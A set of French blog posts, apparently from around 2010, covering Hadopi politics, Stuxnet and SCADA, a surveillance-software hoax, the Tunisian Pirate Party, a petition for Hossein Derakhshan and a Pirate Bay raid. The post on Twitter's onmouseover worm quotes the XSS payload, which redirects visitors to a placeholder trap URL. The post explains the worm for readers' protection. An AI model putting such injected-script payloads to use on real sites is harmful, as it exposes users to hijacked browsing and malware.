Débattre avec Franck Riester ? Ouai mais non…

Je suis tombé sur la charmante proposition de l’ami Skhaen et relayée par Spyou qui lançait l’idée d’un débat avec Franck Riester…. et bien très franchement, c’est hors de question, et je vais vous expliquer pourquoi.

Un débat entend que des personnes aient une volonté réciproque d’échanger. Franck Riester à 90 heures de preuves à charge en vidéo à son encontre (vous les trouverez dans le médiakit de la Quadrature du Net, il s’agit des débats parlementaires sur Hadopi 1 et 2 … anéfé.. rejeté…), il n’écoute que lui même, y compris quand il sait qu’il raconte n’importe quoi, qu’il désinforme, et qu’il sert sa propagande pour diaboliser le Net.

Ensuite, la langue de bois, quand elle est maniée avec art, peut être distrayante… là même pas… Franck Riester ne m’amuse pas le moins du monde. Ni sur le fond, ni sur la forme… bon ok, un cours de firewalling Open Office avec Christine Albanel, vaut bien une certification Cisco… Mais voilà, je préfère me concentrer sur un dialogue sérieux avec des interlocuteurs autrement plus cortiqués.

Enfin, je n’ai pas pour vocation à instruire une personne ultra compétente en son domaine, puisque comme la député Marland-Militello, il a été rapporteur sur Hadopi… c’est donc qu’il connait parfaitement internet… Comme la député Marland Militello… « Je veux une république irréprochable » disait notre président… et un Internet civilisé dans lequel Franck Riester lutte contre les hackers

Ça va ? Vous en avez beaucoup attrapé des hackers Monsieur Riester depuis votre brillante sortie ? Parce qu’en attendant, les pirates, eux, ils sont morts de rire.

Donc non franchement, je vais laisser monsieur Riester débattre tout seul et continuer à être l’un des artisans majeurs de la défaite de Nicolas Sarkozy et de la désaffection des jeunes pour l’UMP, il se débrouille parfaitement sans moi.

D’ailleurs monsieur Riester a surement mieux à faire… Il pourrait par exemple tenter d’aider le ministre de la culture à répondre aux questions des parlementaires qui trainent depuis plus d’un an !

Surveillermonsalarié.com est un superbe canular

Bad cop

Vous l’avez peut-être découvert comme moi le weekend dernier, le site Surveillermonsalarié.com a pointé son nez sur la toile. Proposant pour 790 euros HT et par poste un logiciel de surveillance capable d’intercepter des données des salariés en entreprise avec sa fonction keylogger ou encore capable de prendre un screenshot par seconde et par écran… de quoi remplir le cloud d’Amazon… ce logiciel prétend faire gagner 2 mois de productivité et par salarié aux patrons d’entreprises.

Plusieurs scénarios possibles :

  • Soit l’ami Damour est un très bon communicant qui a réussi un joli coup de pub pour sa société avec un logiciel qui n’a jamais existé (ce que les captures de cette solution tendent à prouver);
  • Soit ce logiciel qui semble totalement illégal existe bien, dans quel cas c’est vraiment de l’inconscience de sa part ;
  • Soit il s’agit d’une arnaque… tout simplement ;
  • Soit c’est un splendide piège pour les patrons qui manifestent de l’intérêt pour cette solution… attention c’est comme ça qu’on se retrouve sur 4chan.

Ma conviction est qu’il s’agit surtout d’un canular, comme expliqué ici. Désolé Korben, Guillaume, 01Net…. vous vous êtes fait piéger 😉

Naissance du Parti Pirate Tunisien

pptnC’est aujourd’hui un jour à marquer d’une pierre blanche pour les internautes de Tunisie : le Parti Pirate Tunisien est né ! C’est dans un contexte politique particulièrement délicat, où de jour en jour les libertés numériques s’amenuisent… et les libertés tout court, que cette formation politique, portée et soutenue par une organisation internationale, est née. La création d’un Parti Pirate Tunisien est donc un acte courageux qu’il convient de saluer à sa juste valeur. Il porte un élan démocratique nouveau auquel on ne peut être indifférent dans le contexte politique agité de ce pays. La censure des réseaux sociaux et du net en général en Tunisie est un fait, Facebook y est par exemple attaqué et la liberté d’expression se limite à ce que le pouvoir daigne y tolérer. Fabrice de Read Write Web a d’ailleurs pu tester la conception de la démocratie du pouvoir tunisien, ce qui lui aura valu quelques fatwas et Read Write Web est maintenant inaccessible dans ce pays.

Mais on le sait bien, la censure du Net ou l’art d’arrêter l’océan avec les mains, ça ne fonctionne pas, il suffit de s’équiper correctement pour contourner les systèmes de filtrage mis en place.

Autant vous dire que nous sommes ici quelques blogeurs qui seront très attentifs à  l’évolution de cette nouvelle formation politique et de ses membres qui portent la liberté d’expression et la défense des droits de l’homme en Tunisie.

Longue vie au Parti Pirate Tunisien !

SCADA et Stuxnet ou les prémices d’une scadastrophe

Propagation de Stuxnet

Voici un thème dont j’aimerai beaucoup vous parler librement, mais voilà, ça ne va pas être possible. Sans pratiquer la langue de bois et en essayant de faire très court, je vais simplement ici vous faire part de mon sentiment sur une infection qui cible en ce moment l’Iran, l’Inde, le Pakistan et une poignée d’autres pays en Asie du sud est, mais aussi dans une moindre mesure, les continents européens et américains (voir la carte de la propagation).

SCADA, ou Supervisory Control And Data Acquisition, est un système de surveillance et d’acquisition de données qui existe maintenant depuis plusieurs décennies. SCADA opère le monitoring d’infrastructures, depuis la gestion de l’énergie dans un immeuble jusqu’à la température du noyau d’un réacteur nucléaire en passant par les ponts, les tunnels, les gazoducs, les oléoducs … Ça ne vous rappelle rien ? Moi comme ça, je pense un peu au scénario de Die Hard 4.

En clair, si un pays cherchait à paralyser un autre pays, en vue d’une attaque, SCADA serait une cible de choix. Quand j’ai commencé à m’intéresser au délit de négligence caractérisée, je me suis demandé ce que SCADA était devenu depuis l’arrivée du web… et bien c’est une … scadastrophe. On trouve certains systèmes accessibles depuis le Net, dont certains sans authentification. Ils ne sont certes pas simples à trouver, ce ne sont certainement pas les plus sensibles… mais on en trouve, et l’apparition des iPhones et autres blackberry y est surement pour quelque chose. On trouve même des clients lourds SCADA sur Megaupload pour tout vous dire… Certains chefs d’entreprises qui déploient ce genre de systèmes de contrôle aiment bien, en mobilité, garder un oeil sur leur production. Je n’irai pas plus loin pour l’instant sur le sujet et je vous donne, peut être, rendez-vous l’été prochain, pour un talk sur ce thème.

Depuis quelques mois maintenant, une infection virale, Stuxnet, cible des équipements SCADA du constructeur SIEMENS. Sa propagation, particulièrement ciblée sur, semble t-il, les infrastructures iraniennes, a de quoi soulever quelques interrogations. Les autorités iraniennes affirment que le worm n’a pour l’instant pas fait de dégâts, mais ne prépare t-il pas une attaque qui risque d’en faire bien plus (embarque t-il une bombe logique ?). Ce sont plus 30 000 machines en Iran qui en sont actuellement victimes.

Autre interrogation légitime, qui a pu mettre en place une stratégie de propagation aussi ciblée si ce n’est un État ? Certains n’hésitent pas à affirmer qu’il s’agit d’une attaque bien dirigée contre les infrastructures nucléaires iraniennes, et très franchement, je doute qu’elle soit l’oeuvre de militants Greenpeace. S’il est encore un peu tôt pour parler d’une cyber guerre, vu d’ici, ça y ressemble quand même drôlement. Israël et la Russie sont même pointés du doigt, mais à ce jour, rien ne nous autorise à l’affirmer avec certitude. Quoi qu’il en soit, le spectre d’une agence gouvernementale plane sur Stuxnet et il semble que des moyens considérables aient été déployés pour rendre cette infection possible (des moyens humains pour toucher les infrastructures sensibles en leur coeur et des moyens techniques pour coder ce worm).

Techniquement, Stuxnet exploiterait non pas un mais 4 0day (une véritable débauche de moyens !) pour s’engouffrer dans la faille LNK découverte en juin dernier et présente dans pratiquement toutes toutes les versions de Windows (jusqu’à Seven… « c’était mon idée »). Il embarquerait un rootkit et un chiffrement très complexe à casser pour cibler le Simatic WinCC de Siemens, ses systèmes SCADA et tendrait à tenter d’infecter la base de données à laquelle ces solutions se connectent. L’exécution du payload rendue possible par l’exploitation de la faille LNK permet, depuis une simple clef USB liant un appel de lien .ink, de compromettre le système en exécutant du code malicieux… c’est assez imparable et particulièrement élaboré.

Stuxnet inquiète et à juste titre, sa persistance n’est pas faite pour rassurer et on se demande qui pourrait déployer autant de moyens pour compromettre un système aussi sensible, et surtout, dans quel but.

En tout, cas… moi je dis ça mais je dis rien hein… j’en connais qui devraient sérieusement se pencher sur cette question au lieu de faire la chasse aux téléchargeurs de mp3. La compromission de SCADA, c’est tout sauf de la science fiction, et c’est tout sauf rigolo… des vies sont en jeu, et là je ne parle pas de pirates qui tuent les artistes en provocant des AVC par DDoS… mais de vrais méchants qui pourraient tuer de vrais gens.

Imprimante 3D Thing-O-Matic! : Le MakerBot nouveau est arrivé

makerbot thingomaticDans les gros jouets avec lesquels les geeks et les hackers peuvent s’éclater, il y a les imprimantes 3D. Le concept est de réaliser vous mêmes des objets usuellement produits avec des procédés industriels lourds, dans votre propre garage (… et même dans votre salon si votre conjoint(e) supporte cet objet étrange au quotidien). MakerBot Industries propose un kit complet, à monter vous même : une véritable imprimante 3D avec laquelle vous allez pouvoir produire des formes que vous aurez préalablement conceptualisé avec des gabarits 3D. L’électronique est en partie assurée par des composants Arduino, du matériel le plus ouvert possible, le plus hackable possible.

Le MakertBot nouveau, le Thing-O-Matic! est une petite révolution, il est maintenant capable de réaliser consécutivement plusieurs impressions 3D d’un objet là où une seule était possible avec le premier modèle de MakerBot. Le Thing-O-Matic! c’est aussi une précision accrue, des axes d’impression plus robustes, et une qualité globale sensiblement améliorée. Les mécanismes  ont été rendus plus précis, vous permettant de réaliser des formes encore plus délirantes. Le Thing-O-Matic! est aussi 6 fois plus rapide que la version précédente !

Niveau accessibilité, si ce matériel reste pour bidouilleurs relativement avertis, l’accent a aussi été mis sur la facilité de montage et de paramétrage global. A l’utilisation, c’est donc plus simple, plus rapide plus précis … et non, ce n’est pas l’iPhone 5 !

L’engin est actuellement proposé pour la somme de 1225$ et un délai de livraison de 7 semaines (et oui c’est du fait main !), mais je suis persuadé que John et Wim sont en train de lorgner sur la bestiole, aussi vous devriez pouvoir très prochainement vous les procurer en Europe sur le store d’Hackable-Devices.

Je vous invite également, si vous découvrez cet univers dans ce billet, d’aller jeter un oeil attentif sur ce que certains hackers font avec leur RepRap et surtout de prendre connaissance des travaux d’Alexandre sur Usinette et du projet Fablab, dont on espère tous que vous entendrez très vite parler.

HADOPI : le jeu concours de la Quadrature du Net

Grand Jeu HADOPI imageAlors que la HADOPI s’apprête à lancer les premiers mails ( si, si … ça arrive), La Quadrature du Net lance un grand jeu concours pour désigner le vainqueur, à savoir la première personne qui recevra son mail d’avertissement. Une manière originale de marquer le coup, qui devrait en inciter plus d’un à vouloir jouer.

Le gagnant qui se verra remettre un bundle exceptionnel « même pas peur » :

  1. un π-shirt (même moi j’en ai pas… et rien que pour ça je sens que je vais allumer la mule et bittorrent à fond les ballons pour downloader en boucle un ou deux blockbuster… mais vu que les premières adresses IP ont été fournies, je n’ai malheureusement que bien peu de chances d’être sélectionner),
  2. Un exemplaire du considérant 12 de la décision 2009-580 du Conseil Constitutionnel, censurant l’HADOPI 1 et liant libertés d’expression à accès au Net, sorti d’une presse à imprimer du XIXè siècle … ça aussi… need <3;
  3. Une IP de la société de police privée du Net Trident Media Guard … si le remote shell est fournit, need aussi <3;
  4. Un coup à boire sur Paris ou ailleurs ;
  5. Une suggestion de réponse à l’HADOPI.

Tout est ici

Libérez Hossein ‘Hoder’ Derakhsha, condamné à mort par le régime iranien

hoderVous noterez qu’il est très rare que je relaie ce genre d’information, mais là, franchement, c’en est vraiment trop. Hossein ‘Hoder’ Derakhshan est un célèbre journaliste et blogger irano Canadien (son blog est le blog en langue persane le plus visité, ce qui lui a valu le surnom de Blogfather). Rien ne peut justifier la condamnation à mort d’Hossein.

C’est un très actif contributeur de Wikipedia sur tout ce qui touche à l’Iran, ce qui lui aura valu une arrestation en territoire Allemand et un interrogatoire par les services secrets iraniens, ce qu’il dénonça publiquement… un affront pour Téhéran.

Emprisonné en Iran depuis le premier octobre 2008, il a été condamné à mort le 22 septembre 2010, pour collaboration avec les gouvernements hostiles au régime.

Vous trouverez sur ce site une pétition contre cette condamnation inacceptable :

http://www.freetheblogfather.org/

Voici donc un communiqué que je vous invite à très largement relayer, tous les bloggers qui sont attachés à la liberté d’expression doivent se sentir concernés par le sort de Hossein :

APPEL D’UNE JEUNE FRANCAISE, SANDRINE MURCIA, POUR LA LIBERATION IMMEDIATE DE SON COMPAGNON
HOSSEIN DERAKHSHAN, BLOGGEUR ET JOURNALISTE IRANO-CANADIEN, DETENU A LA PRISON D’EVIN EN IRAN.
URGENCE : LE PROCUREUR DE TEHERAN A REQUIS LE 22 SEPTEMBRE LA PEINE DE MORT A SON ENCONTRE.

SAUVEZ HOSSEIN !

« Je lance un appel à la communauté internationale pour la libération de mon compagnon, Hossein Derakhshan, bloggeur et journaliste irano-canadien, surnommé Blogfather, arrêté en novembre 2008 et détenu à la prison de Evin, Téhéran, Iran depuis lors. Nous venons d’apprendre hier que le procureur de Téhéran a requis la peine de mort. Les jours qui viennent pourraient voir cette sentence confirmée par les autorités iraniennes, alors même qu’il n’a fait qu’exercer son métier de journaliste.

L’urgence est donc totale.

A l’heure où toutes les grandes nations se réunissent à New York, dans le cadre de l’Organisation des Nations Unies, c’est au Président Ahmadinejad et à toute la communauté internationale, que je souhaite m’adresser pour qu’Hossein retrouve très vite la liberté, au nom des droits de l’homme et de la liberté d’expression des journalistes. »

déclare Sandrine Murcia, fondatrice d’une agence conseil en services numériques, compagne d’Hossein, avec lequel elle partage la passion des nouvelles technologies de l’information et de la communication.

Hossein Derakhshan (né le 7 janvier 1975), mieux connu sous le pseudonyme de « Hoder », est un journaliste irano-canadien, webloger basé à Toronto puis à Paris. Son blog, rédigé en persan et en anglais, est un des blogs persanophones les plus visités. Hossein Derakhshan établit un manuel d’utilisation du blog, en persan, à l’usage des Iraniens. Ce manuel connait un tel succès qu’en un mois, plus de 100 blogs en persan sont créés. Il existe maintenant des dizaines de milliers de blogs en persan. Ce qui lui vaut le surnom de « Blogfather ».

Hossein Derakhshan débute dans le journalisme en écrivant des articles sur Internet dans le journal réformiste Asr-e-Azadegan. En décembre 2000, il part vivre au Canada, à Toronto, où il commence son blog, en persan, le 25 septembre 2001. Son titre : Sardabir : khodam (Editor : myself).

En 2005, Hossein Derakhshan tient un discours à la conférence Wikimania de Francfort, en Allemagne. Alors qu’il quitte l’Allemagne, il est arrêté et interrogé par les services secrets iraniens au sujet de ses contributions au Wikipédia en persan, et au sujet de sonblog. Il refuse alors de présenter des excuses publiques, comme cela lui est demandé. Au contraire, il rédige un rapport sur ce qui vient de lui arriver, qu’il publie sur son blog. Il travaille alors pour Newsweek, the Guardian, New York Times notamment.

Hossein Derakhshan se rend deux fois en Israël et publiquement rend compte de ses voyages dans son blog pour «contribuer au rapprochement entre Tel-Aviv et Téhéran». Pour un citoyen iranien, se rendre en Israël est passible de la peine de mort.

Très attaché à la culture française, aux valeurs des Lumières, il s’installe à Paris avec Sandrine Murcia en 2007 pour exercer son métier de journaliste et de bloggeur. Il se prend de passion pour les philosophes post-modernistes tels Foucault, Derrida et Deleuze.

Hossein Derakhshan retourne à Téhéran en octobre 2008 pour couvrir le 30ème anniversaire de la Révolution Iranienne et les élections présidentielles de juin 2009. Il est arrêté au domicile de ses parents le 1er novembre 2008. Maintenu en isolation et soumis aux interrogatoires, son procès s’ouvre en juin 2010 à huis clos. Sa famille n’a pas été autorisée à assister aux séances de la cour ni à le voir. Le procureur de Téhéran a requis la peine de mort pour Hossein Derakhshan, accusé de collaboration avec des gouvernements hostiles au régime, d’actes de propagande à l‘encontre des intérêts de la République Islamique, d’insultes aux symboles religieux.

Aidez-nous à libérer Hossein Derakhshan !

A Paris, le 23 septembre.

  • Signez la pétition en ligne:

http://www.freetheblogfather.org/

  • Facebook: Libérez Hossein Derakhshan // Free Hossein Derakhshan

http://www.facebook.com/group.php?gid=37459792838

Contact:

Sandrine Murcia
[email protected]
+33 6 25 90 11 58

Twitter et le worm du onmouseover

Comme de nombreuses personnes, je me suis fait piéger en utilisant un bouton de retweet… enfin piégé, comme les contacts qui me l’ont filé et comme les contacts à qui je l’ai refilé, en fait c’est imparable, le seul moyen de l’éviter est de ne pas se rendre sur twitter.com.  Vous vous doutez bien que certains n’ont pas manqué l’occasion de me taquiner, et ils ont raison.  Leur point commun : aucun d’entre eux n’utilise l’interface web mais un client Twitter. Les clients tiers ne sont pas concernés (enfin s’ils n’executent pas de javascript douteux et non du Java comme j’ai pu le lire dans la presse). Cest bien le site web de Twitter qui est affecté et il est donc vivement recommandé de ne pas l’utiliser pour le moment, rabattez vous sur un client qui gère les script/noscript plus correctement que le site web lui même. C’est un XSS qui est actuellement exploité et que les utilisateurs se refilent gentiment. Tout ceci ne fait qu’apporter un peu plus d’eau au moulin sur une question que je m’étais posé en lisant le décret d’application HADOPI qui touche à la sécusation de sa connexion Internet :

où s’arrête la connexion Internet que je suis sensé sécuriser ?

  • Réponse A : à ma machine ?
  • Réponse B : à ma box ?
  • Réponse C : au noeud de raccordement de mon opérateur ?
  • Réponse D : au site web que je visite ?

… voici la démonstration parfaite que sécuriser une « connexion Internet » ne veut RIEN dire ! La vulnérabilité exploitée sur Twitter peut servir à compromettre des millions de données de particuliers, et donc des accès à leur LAN, ajoutez à ça que tout se retrouve en ce moment sur pastebin.. public… Sur ce point, n’en déplaise à certains experts, tout expert soient ils, plaider en faveur de la sanction des utilisateurs est une ânerie.

Je n’ai pas observé de vol de compte ou autre vol de session dans le submit de l’url générée par la connexion via le mouseover, mais une exploitation plus méchante pourrait faire beaucoup de mal. Le worm renvoi à une url piégée qui peut contaminer votre machine (je n’ai pas eu ce privilège car je ne suis pas sur Windows, je n’ai pas eu le droit à une redirection et je n’ai pas cliqué sur l’url générée), mais il serait intéressant d’aller jeter un oeil sur les malwares qui s’y trouvent.. Cependant je m’excuse auprès des follower auxquels j’ai surement transmis le tweet piégé (je l’ai aussitôt effacé de ma timeline).

La source viendrait d’un compte créé pour l’occasion @rainbowtwtr, le poc est très simple, ça nous donne un truc du type  :

http://twitter.com/pwn3d@ « onmouseover = » javascript: window.location = « http://www.urlpiegee.com ‘,’ /

… simple mais efficace. Attendez vous à des variantes aujourd’hui même qui pourraient être plus méchantes, le risque est présent tant que twitter n’aura pas corrigé la vulnérabilité exploitée sur son propre site.

Comme Google en atteste, ce worm fait mal avec plus de 18000 réponses pour le moment (Twitter étant un média social viral par excellence, c’est un terrain de choix pour la propagation de ce genre de choses).

Le conseil du moment : utilisez un client Twitter (une extension pour votre navigateur ou autre, mais ne passer pas par le site twitter.com

Open World Forum 2010 (du 30 septembre au 1er octobre)

open world forumParmi les manifestations où je ne me fais généralement pas prier pour venir, il y a l’Open World Forum. Cette année, comme pour les deux éditions précédentes, vous pourrez donc m’y retrouver, aux côtés des ours de Bearstech qui participeront d’ailleurs activement à des cycles de conférences avec de nombreux intervenants internationaux. Je serais également ravis d’y retrouver plein de gens que j’aime bien comme Pilot Systems, eNovance, Altic, Nuxeo, Smile, tous les copains de Ploss… et de très nombreux professionnels de l’Open Source.

Cette année, l’Open World Forum, c’est 3 jours de conférences et d’ateliers sur des sujets très variés, en rapport avec l’Open Source. 2010 est un cru qui donnera la part belle aux contenus ouverts, par exemple avec cette conférence sur les medias ouverts et cet atelier sur les médias vidéos ouverts. Cloud computing, gestion de contenu, business intelligence…. la planète open source s’enrichie d’années en années, elle s’invite dans tous les systèmes d’information et ne libère plus que des logiciels. Vous pouvez trouver le programme complet ici.

Open World Forum (du 30 septembre au 1er octobre) :

The Pirate Bay : les polices de 14 pays unies pour un raid contre le tracker torrent

the pirate bay
The Pirate Bay

Aujourd’hui se déroule une opération d’envergure implicant les forces de polices de 14 pays et faisant suite à deux années de préparation. Il s’agit visiblement de tenter de démanteler l’architecture technique de The Pirate Bay, le célèbre tracker Torrent sur lequel on ne download pas que des Krissprolls. L’essentiel de l’action semble s’être cependant tenue en Suède à Stockholm, Malmö, l’Université d’Umeå et Eskilstuna. L’hébergeur suédois hébergerait également Wikileaks mais les autorités font savoir que Wikileaks n’était pas concerné par ce raid.

En plus de la Suède, des actions ont été parallelement menées aux Pays-Bas, en Belgique, en Norvège, en Allemagne, en Grande-Bretagne, en République tchèque et en Hongrie. 4 personnes soupçonnées d’infraction aux lois sur le copyright sont actuellement interrogées.

Pour l’instant, depuis la France The Pirate Bay reste accessible mais ce n’est déjà plus le cas dans certains pays d’Europe. Cette intervention fait suite à une action en justice d’origine belge et dit viser la scène warez.

Ce n’est pas la première fois que The Pirate Bay fait l’objet d’actions visant à démanteler son infrastructure, le site a déjà à plusieurs reprises été mis hors ligne, et ceci n’a jamais duré bien longtemps. Quid de cette opération ? La suite dans les heures qui viennent.